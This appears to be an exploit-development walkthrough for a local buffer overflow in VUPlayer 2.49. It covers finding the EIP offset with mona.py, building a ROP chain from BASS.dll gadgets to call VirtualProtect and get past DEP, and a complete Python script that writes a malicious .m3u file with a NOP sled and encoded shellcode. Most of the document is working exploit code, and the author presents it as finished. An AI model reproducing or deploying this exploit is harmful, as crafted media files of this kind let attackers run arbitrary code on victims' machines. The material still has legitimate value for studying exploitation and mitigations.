VUPlayer 2.49 Exploit (Local)

Test Environment: Windows 10 x64
Test Program: VUPlayer 2.49 x86
Language used: Python 2.7
Debugger: Immunity Debugger
Module used: mona.py
Mitigation: DEP, ASLR

 

 

Use !mona pc 1500 command to generate a string of specfic patterns.

Created pattern file is in the logs folder.

 

 

The EIP register is controll with 0x6842378 and the program has ended.

 

 

Use !mona po 68423768 command to find offset.

Offset is the 1012byte.

 

 

payload = ''
payload += 'A' * 1012
payload += 'B' * 4

f = open('test.m3u', 'w')
f.write(payload)
f.close()

Check using the offset value found to determine if EIP is controlled by the desired value.

If the offset is correct, the EIP will be manipulated with B.

 

 

The EIP was manipulated to 0x42424242 as we wanted.

 

 

Use !mona modules command to find a list of modules.

Use ROP techniques using modules without protection.

I will use the BASS.dll module.

 

 

command: !mona rop -n [module name]

Use the mona module to get the gadget.

 

 

import struct

def create_rop_chain():
    rop_gadgets = [
      0x10015fe7,  # POP EAX # RETN [BASS.dll] 
      0x10040284,  # ptr to &VirtualProtect() [IAT BASS.dll]
      0x1001eaf1,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll] 
      0x10030950,  # XCHG EAX,ESI # RETN [BASS.dll] 
      0x1001d748,  # POP EBP # RETN [BASS.dll] 
      0x100222c5,  # & jmp esp [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10032f32,  # XCHG EAX,EBX # RETN 0x00 [BASS.dll] 
      0x10015f82,  # POP EAX # RETN [BASS.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x10014db4,  # NEG EAX # RETN [BASS.dll] 
      0x10038a6c,  # XCHG EAX,EDX # RETN [BASS.dll] 
      0x101049ec,  # POP ECX # RETN [BASSWMA.dll] 
      0x10108429,  # &Writable location [BASSWMA.dll]
      0x10016218,  # POP EDI # RETN [BASS.dll] 
      0x1001dc05,  # RETN (ROP NOP) [BASS.dll]
      0x10015f77,  # POP EAX # RETN [BASS.dll] 
      0x90909090,  # nop
      0x1001d7a5,  # PUSHAD # RETN [BASS.dll] 
    ]

    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

shellcode = (
    "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
    "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
    "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
    "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
    "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
    "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
    "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
    "\x1c\x39\xbd"
)

rop_chain = create_rop_chain()

payload = ""
payload += "A" * 1012
payload += rop_chain
payload += "\x90" * 100 # nop sled
payload += shellcode

f = open("exploit.m3u", "w")
f.write(payload)
f.close()

Completed exploit code

 

 

Successful exploitation could allow the calculator to run.